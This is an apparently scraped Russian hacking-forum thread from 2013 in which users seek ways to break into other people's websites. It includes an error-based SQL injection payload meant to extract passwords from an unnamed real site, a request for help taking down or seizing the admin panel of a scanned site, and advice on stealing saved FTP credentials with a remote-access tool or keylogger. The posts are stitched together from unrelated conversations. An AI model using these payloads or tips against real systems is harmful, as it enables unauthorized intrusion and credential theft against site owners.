 |
|
08.12.2013, 01:00
|
|
Новичок
Регистрация: 17.09.2013
Сообщений: 9
С нами:
6659606
Репутация:
0
|
|
привет всем. вопрос кто знает что это Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
|
|
|
08.12.2013, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 05.08.2011
Сообщений: 1,690
С нами:
7774166
Репутация:
255
|
|
Цитата:
Сообщение от the_Ghost
привет всем. вопрос кто знает что это Hide:
Чтобы просмотреть данный текст, авторизуйтесь на форуме.
Капитан очевидность - это ссылка.
code:
http://wap.jamango.ru/app/mail/index.html.d?connect=mail?email=@mail.ru&pass=8&en ter=Подключить ящик |
|
|
|
08.12.2013, 01:00
|
|
Новичок
Регистрация: 17.09.2013
Сообщений: 9
С нами:
6659606
Репутация:
0
|
|
там случайно уязвимости нет?
|
|
|
|
08.12.2013, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 05.08.2011
Сообщений: 1,690
С нами:
7774166
Репутация:
255
|
|
Цитата:
Сообщение от the_Ghost
там случайно уязвимости нет?
Такого файла вообще нет на сервере
code:
The document name you requested (/apps/mail//index.html.d) could not be found on this server. |
|
|
|
08.12.2013, 01:00
|
|
Познающий
Регистрация: 10.10.2013
Сообщений: 34
С нами:
6626486
Репутация:
-5
|
|
А как вообще это сделать?
|
|
|
|
08.12.2013, 01:00
|
|
Познавший АНТИЧАТ
Регистрация: 05.08.2011
Сообщений: 1,690
С нами:
7774166
Репутация:
255
|
|
Цитата:
Сообщение от 666Marat
А как вообще это сделать?
Шире свой вопрос можешь раскрыть?
А то я тоже могу написать - через уязвимость вэб-приложений
|
|
|
|
08.12.2013, 01:00
|
|
Познающий
Регистрация: 10.10.2013
Сообщений: 34
С нами:
6626486
Репутация:
-5
|
|
Короче,я просканировал сайт читаков и узнал айпи,зашел в XSpider ввел ип и вот что выдало,как можно сайт угробить?или получить админ панель?
|
|
|
|
11.12.2013, 01:00
|
|
Познающий
Регистрация: 21.05.2011
Сообщений: 75
С нами:
7883606
Репутация:
0
|
|
Нашел SQL injection на одном сайте, не буду описывать на каком. В общем проблема в том что выгружает судя по всему только int-овые поля, id и ip, но username/password не хочет.
Внедряю через пост запрос:
source:
Код:
and
(
select
1
from
(
select
count
(
*
),concat((
SELECT
password
FROM
datbase LIMIT
0
,
1
),
0x3a
,
floor
(rand(
0
)
*
2
))x
from
information_schema.tables
group
by
x)a)
and
Что подскажете? |
|
|
|
13.12.2013, 01:00
|
|
Новичок
Регистрация: 12.01.2013
Сообщений: 3
С нами:
7016726
Репутация:
0
|
|
скорее всего дыра не в вп а у тебя на пк, ищи левые процессы, файлы, непонятные соединения к неизвестным адресам,странности в поведении, просканируй пк другим ав с лицензией
|
|
|
|
13.12.2013, 01:00
|
|
Новичок
Регистрация: 12.01.2013
Сообщений: 3
С нами:
7016726
Репутация:
0
|
|
в первом посте ты писал о версии WP. если например там есть рмс то через него можно стырить сохраненные пароли к фтп, может иметь место кейлоггер который отправит данные для доступа к хостингу, после чего комп можно хоть сто лет не включать))) а на сайт также можно попасть
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
